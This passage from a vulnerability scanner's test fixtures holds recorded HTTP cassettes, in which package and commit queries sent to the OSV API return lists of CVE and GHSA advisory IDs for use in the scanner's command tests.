"2026-03-09T02:10:40.826335Z" }, { "id": "DSA-5650-1", "modified": "2026-03-09T02:08:30.371343Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DEBIAN-CVE-2024-3094", "modified": "2025-11-19T01:12:34.542011Z" }, { "id": "DEBIAN-CVE-2025-31115", "modified": "2025-11-20T10:18:07.484724Z" }, { "id": "DSA-5123-1", "modified": "2026-03-09T02:10:46.054497Z" }, { "id": "DSA-5895-1", "modified": "2026-03-09T02:08:52.515269Z" } ] }, {}, {} ] } headers: Content-Length: - "21542" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_ExplicitExtractors_WithDefaults.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_an_extractor_that_does_not_exist url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 399 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_disabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 22 body: | { "results": [ {}, {}, {} ] } headers: Content-Length: - "22" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_enabled_and_the_defaults url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_different_extractor_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_specific_extractor_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_ExplicitExtractors_WithoutDefaults.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 273 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 273 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_an_extractor_that_does_not_exist url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 399 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_disabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 22 body: | { "results": [ {}, {}, {} ] } headers: Content-Length: - "22" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_directory_with_one_specific_extractor_enabled_and_no_defaults url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/scanning_file_with_one_specific_extractor_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_GithubActions.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 238 host: api.osv.dev body: | { "queries": [ { "commit": "4579d5538f06c5ef615a15bc67ebb9ac0523a973" }, { "commit": "9de7a0544457c6aba755ccb65abb41b0dc1db70d" }, { "commit": "5d60bd2eb4642b64d00c845e5ca9f1ea41fd6db6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_GithubActions/scanning_osv-scanner_custom_format url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 161 body: | { "results": [ {}, { "vulns": [ { "id": "CVE-2023-39137", "modified": "2026-03-15T14:11:43.205446Z" }, { "id": "CVE-2023-39139", "modified": "2026-03-14T12:08:30.752661Z" } ] }, {} ] } headers: Content-Length: - "161" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 238 host: api.osv.dev body: | { "queries": [ { "commit": "4579d5538f06c5ef615a15bc67ebb9ac0523a973" }, { "commit": "9de7a0544457c6aba755ccb65abb41b0dc1db70d" }, { "commit": "5d60bd2eb4642b64d00c845e5ca9f1ea41fd6db6" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_GithubActions/scanning_osv-scanner_custom_format_output_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 161 body: | { "results": [ {}, { "vulns": [ { "id": "CVE-2023-39137", "modified": "2026-03-15T14:11:43.205446Z" }, { "id": "CVE-2023-39139", "modified": "2026-03-14T12:08:30.752661Z" } ] }, {} ] } headers: Content-Length: - "161" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 169 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "GIT", "name": "github.com/openssl/openssl" }, "version": "openssl-3.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_GithubActions/scanning_osv-scanner_custom_format_with_git_tag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2593 body: | { "results": [ { "vulns": [ { "id": "CVE-2016-2177", "modified": "2026-03-15T22:22:35.782155Z" }, { "id": "CVE-2016-2182", "modified": "2026-03-15T22:06:16.823524Z" }, { "id": "CVE-2022-2274", "modified": "2026-03-14T00:45:56.901948Z" }, { "id": "CVE-2022-3358", "modified": "2026-03-15T22:44:12.519547Z" }, { "id": "CVE-2022-3996", "modified": "2026-03-15T22:44:21.336918Z" }, { "id": "CVE-2022-4203", "modified": "2026-03-14T11:56:48.298901Z" }, { "id": "CVE-2022-4304", "modified": "2026-03-14T11:57:20.473258Z" }, { "id": "CVE-2022-4450", "modified": "2026-03-15T14:48:08.469047Z" }, { "id": "CVE-2023-0215", "modified": "2026-03-15T22:46:35.699581Z" }, { "id": "CVE-2023-0216", "modified": "2026-03-14T14:54:02.977746Z" }, { "id": "CVE-2023-0217", "modified": "2026-03-15T22:46:23.122521Z" }, { "id": "CVE-2023-0286", "modified": "2026-03-14T11:56:55.751641Z" }, { "id": "CVE-2023-0401", "modified": "2026-03-14T12:00:52.936954Z" }, { "id": "CVE-2023-0464", "modified": "2026-03-15T22:46:00.576549Z" }, { "id": "CVE-2023-0465", "modified": "2026-03-15T22:45:58.975327Z" }, { "id": "CVE-2023-0466", "modified": "2026-03-15T22:46:04.107702Z" }, { "id": "CVE-2023-1255", "modified": "2026-03-14T12:01:08.330785Z" }, { "id": "CVE-2023-2650", "modified": "2026-03-15T22:46:51.910562Z" }, { "id": "CVE-2023-2975", "modified": "2026-03-15T14:49:55.221034Z" }, { "id": "CVE-2023-3817", "modified": "2026-03-15T22:45:38.616987Z" }, { "id": "CVE-2023-4807", "modified": "2026-03-14T12:23:37.361743Z" }, { "id": "CVE-2023-5363", "modified": "2026-03-15T22:49:01.513389Z" }, { "id": "CVE-2023-5678", "modified": "2026-03-15T22:49:18.011924Z" }, { "id": "CVE-2023-6129", "modified": "2026-03-15T21:45:17.017844Z" }, { "id": "CVE-2023-6237", "modified": "2026-03-15T22:49:35.974149Z" }, { "id": "CVE-2024-13176", "modified": "2026-03-15T22:49:27.674006Z" }, { "id": "CVE-2024-2511", "modified": "2026-03-15T22:50:31.329929Z" }, { "id": "CVE-2024-4603", "modified": "2026-03-15T13:45:23.443979Z" }, { "id": "CVE-2024-4741", "modified": "2026-03-15T22:50:47.073119Z" }, { "id": "CVE-2024-5535", "modified": "2026-03-15T22:50:00.523154Z" }, { "id": "CVE-2024-9143", "modified": "2026-03-15T22:52:44.104304Z" }, { "id": "CVE-2025-15467", "modified": "2026-03-15T22:51:41.488774Z" }, { "id": "CVE-2025-68160", "modified": "2026-03-15T22:52:16.241316Z" }, { "id": "CVE-2025-69418", "modified": "2026-03-15T22:52:15.052519Z" }, { "id": "CVE-2025-69419", "modified": "2026-03-15T22:52:23.255585Z" }, { "id": "CVE-2025-69420", "modified": "2026-03-15T14:54:02.448397Z" }, { "id": "CVE-2025-9230", "modified": "2026-03-15T21:45:01.944849Z" }, { "id": "CVE-2025-9232", "modified": "2026-03-15T22:22:16.665069Z" }, { "id": "CVE-2026-22795", "modified": "2026-03-15T14:55:17.107605Z" }, { "id": "CVE-2026-22796", "modified": "2026-03-15T22:54:02.133546Z" } ] } ] } headers: Content-Length: - "2593" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_HtmlFile.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_HtmlFile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_HtmlFile_Deprecated.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_HtmlFile_Deprecated url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_JavareachArchive.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3196 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-core" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-kms" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-s3" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:jmespath-java" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.example:hello-tester" }, "version": "1.0-SNAPSHOT" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-annotations" }, "version": "2.6.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-core" }, "version": "2.14.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-databind" }, "version": "2.6.7.1" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.dataformat:jackson-dataformat-cbor" }, "version": "2.6.7" }, { "package": { "ecosystem": "Maven", "name": "commons-codec:commons-codec" }, "version": "1.10" }, { "package": { "ecosystem": "Maven", "name": "commons-logging:commons-logging" }, "version": "1.1.3" }, { "package": { "ecosystem": "Maven", "name": "joda-time:joda-time" }, "version": "2.8.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-lang3" }, "version": "3.12.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpclient" }, "version": "4.5.5" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpcore" }, "version": "4.4.9" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-continuation" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-http" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-io" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-servlets" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "software.amazon.ion:ion-java" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 4418 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-c28r-hw5m-5gv3", "modified": "2023-11-08T04:09:28.159861Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-72hv-8253-57qq", "modified": "2026-03-04T15:06:51.908001Z" }, { "id": "GHSA-h46c-h94j-95f3", "modified": "2026-02-04T03:44:39.385253Z" } ] }, { "vulns": [ { "id": "GHSA-288c-cq4h-88gq", "modified": "2026-02-04T04:33:29.159339Z" }, { "id": "GHSA-4gq5-ch57-c2mg", "modified": "2024-03-15T05:20:21.411726Z" }, { "id": "GHSA-4w82-r329-3q67", "modified": "2024-03-16T05:18:54.922179Z" }, { "id": "GHSA-57j2-w4cx-62h2", "modified": "2026-02-04T04:26:14.546092Z" }, { "id": "GHSA-5949-rw7g-wx7w", "modified": "2025-09-15T07:42:14.888352Z" }, { "id": "GHSA-5r5r-6hpj-8gg9", "modified": "2024-02-18T05:42:28.539166Z" }, { "id": "GHSA-5ww9-j83m-q7qx", "modified": "2024-03-15T01:17:50.016820Z" }, { "id": "GHSA-645p-88qh-w398", "modified": "2024-03-16T05:19:17.936174Z" }, { "id": "GHSA-6fpp-rgj9-8rwc", "modified": "2024-03-15T05:18:54.134884Z" }, { "id": "GHSA-85cw-hj65-qqv9", "modified": "2024-03-15T05:20:15.574552Z" }, { "id": "GHSA-89qr-369f-5m5x", "modified": "2024-02-18T05:37:27.581808Z" }, { "id": "GHSA-8c4j-34r4-xr8g", "modified": "2024-02-18T05:31:52.762759Z" }, { "id": "GHSA-8w26-6f25-cm9x", "modified": "2024-02-18T05:30:48.085017Z" }, { "id": "GHSA-9gph-22xh-8x98", "modified": "2024-02-18T05:33:27.617261Z" }, { "id": "GHSA-9m6f-7xcq-8vf8", "modified": "2024-02-18T05:32:25.400029Z" }, { "id": "GHSA-c8hm-7hpq-7jhg", "modified": "2024-03-15T01:17:19.251183Z" }, { "id": "GHSA-cf6r-3wgc-h863", "modified": "2024-02-18T05:32:56.325249Z" }, { "id": "GHSA-cggj-fvv3-cqwv", "modified": "2024-03-15T01:18:46.938616Z" }, { "id": "GHSA-cjjf-94ff-43w7", "modified": "2024-03-11T05:19:23.395848Z" }, { "id": "GHSA-cmfg-87vq-g5g4", "modified": "2024-03-15T01:18:17.903231Z" }, { "id": "GHSA-cvm9-fjm9-3572", "modified": "2024-02-18T05:25:36.165759Z" }, { "id": "GHSA-f3j5-rmmp-3fc5", "modified": "2024-03-15T05:20:35.120151Z" }, { "id": "GHSA-f9xh-2qgp-cq57", "modified": "2024-02-18T05:32:05.421673Z" }, { "id": "GHSA-fmmc-742q-jg75", "modified": "2024-03-16T05:19:55.172981Z" }, { "id": "GHSA-fqwf-pjwf-7vqv", "modified": "2024-07-03T21:22:37.578162Z" }, { "id": "GHSA-gjmw-vf9h-g25v", "modified": "2024-03-16T05:19:37.211801Z" }, { "id": "GHSA-gwp4-hfv6-p7hw", "modified": "2024-03-13T05:27:58.436849Z" }, { "id": "GHSA-gww7-p5w4-wrfv", "modified": "2024-03-15T01:05:18.790961Z" }, { "id": "GHSA-h3cw-g4mq-c5x2", "modified": "2024-02-18T05:30:45.329621Z" }, { "id": "GHSA-h592-38cm-4ggp", "modified": "2024-03-15T01:16:50.905794Z" }, { "id": "GHSA-h822-r4r5-v8jg", "modified": "2026-02-04T02:19:17.186100Z" }, { "id": "GHSA-jjjh-jjxp-wpff", "modified": "2026-02-04T02:23:59.070528Z" }, { "id": "GHSA-m6x4-97wx-4q27", "modified": "2024-02-18T05:21:54.725837Z" }, { "id": "GHSA-mph4-vhrx-mv67", "modified": "2024-03-15T01:16:21.467932Z" }, { "id": "GHSA-mx7p-6679-8g3q", "modified": "2024-03-15T01:01:46.432481Z" }, { "id": "GHSA-p43x-xfjf-5jhr", "modified": "2024-03-15T00:33:14.700288Z" }, { "id": "GHSA-q93h-jc49-78gg", "modified": "2024-03-16T05:19:47.711015Z" }, { "id": "GHSA-qjw2-hr98-qgfh", "modified": "2024-02-18T05:20:56.894470Z" }, { "id": "GHSA-qr7j-h6gg-jmgc", "modified": "2024-03-11T05:21:14.313980Z" }, { "id": "GHSA-r3gr-cxrf-hg25", "modified": "2024-06-25T14:20:21.323050Z" }, { "id": "GHSA-r695-7vr9-jgc2", "modified": "2024-02-18T05:30:45.856594Z" }, { "id": "GHSA-rfx6-vp9g-rh7v", "modified": "2024-03-11T05:17:47.425595Z" }, { "id": "GHSA-rgv9-q543-rqg4", "modified": "2026-02-04T02:40:22.352009Z" }, { "id": "GHSA-rpr3-cw39-3pxh", "modified": "2026-03-13T22:01:03.241551Z" }, { "id": "GHSA-v585-23hc-c647", "modified": "2024-02-18T05:22:38.024460Z" }, { "id": "GHSA-vfqx-33qm-g869", "modified": "2024-02-18T05:24:26.785781Z" }, { "id": "GHSA-w3f4-3q6j-rh82", "modified": "2024-03-11T05:18:22.727055Z" }, { "id": "GHSA-wh8g-3j2c-rqj5", "modified": "2024-03-15T00:31:15.123603Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-j288-q9x7-2f5v", "modified": "2026-02-04T03:18:02.851501Z" } ] }, { "vulns": [ { "id": "GHSA-7r82-7xv7-xcpj", "modified": "2026-02-04T02:20:49.137443Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-cj7v-27pg-wf7q", "modified": "2026-03-13T22:01:09.359414Z" }, { "id": "GHSA-hmr7-m48g-48f6", "modified": "2026-02-04T03:59:52.327364Z" }, { "id": "GHSA-qh8g-58pp-2wxh", "modified": "2026-02-04T05:13:21.910792Z" }, { "id": "GHSA-wjpw-4j6x-6rwh", "modified": "2026-03-09T11:29:07.402944Z" } ] }, {}, { "vulns": [ { "id": "GHSA-3gh6-v5v9-6v9j", "modified": "2026-02-04T03:12:16.534413Z" }, { "id": "GHSA-gwcr-j4wh-j3cq", "modified": "2026-03-13T21:59:32.515061Z" }, { "id": "GHSA-j26w-f9rq-mr2q", "modified": "2026-02-04T03:32:43.162423Z" } ] }, {}, { "vulns": [ { "id": "GHSA-264p-99wq-f4j6", "modified": "2026-02-04T03:21:48.913313Z" } ] } ] } headers: Content-Length: - "4418" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3196 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-core" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-kms" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-s3" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:jmespath-java" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.example:hello-tester" }, "version": "1.0-SNAPSHOT" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-annotations" }, "version": "2.6.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-core" }, "version": "2.14.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-databind" }, "version": "2.6.7.1" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.dataformat:jackson-dataformat-cbor" }, "version": "2.6.7" }, { "package": { "ecosystem": "Maven", "name": "commons-codec:commons-codec" }, "version": "1.10" }, { "package": { "ecosystem": "Maven", "name": "commons-logging:commons-logging" }, "version": "1.1.3" }, { "package": { "ecosystem": "Maven", "name": "joda-time:joda-time" }, "version": "2.8.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-lang3" }, "version": "3.12.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpclient" }, "version": "4.5.5" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpcore" }, "version": "4.4.9" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-continuation" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-http" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-io" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-servlets" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "software.amazon.ion:ion-java" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis_and_disabled_enricher url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 4418 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-c28r-hw5m-5gv3", "modified": "2023-11-08T04:09:28.159861Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-72hv-8253-57qq", "modified": "2026-03-04T15:06:51.908001Z" }, { "id": "GHSA-h46c-h94j-95f3", "modified": "2026-02-04T03:44:39.385253Z" } ] }, { "vulns": [ { "id": "GHSA-288c-cq4h-88gq", "modified": "2026-02-04T04:33:29.159339Z" }, { "id": "GHSA-4gq5-ch57-c2mg", "modified": "2024-03-15T05:20:21.411726Z" }, { "id": "GHSA-4w82-r329-3q67", "modified": "2024-03-16T05:18:54.922179Z" }, { "id": "GHSA-57j2-w4cx-62h2", "modified": "2026-02-04T04:26:14.546092Z" }, { "id": "GHSA-5949-rw7g-wx7w", "modified": "2025-09-15T07:42:14.888352Z" }, { "id": "GHSA-5r5r-6hpj-8gg9", "modified": "2024-02-18T05:42:28.539166Z" }, { "id": "GHSA-5ww9-j83m-q7qx", "modified": "2024-03-15T01:17:50.016820Z" }, { "id": "GHSA-645p-88qh-w398", "modified": "2024-03-16T05:19:17.936174Z" }, { "id": "GHSA-6fpp-rgj9-8rwc", "modified": "2024-03-15T05:18:54.134884Z" }, { "id": "GHSA-85cw-hj65-qqv9", "modified": 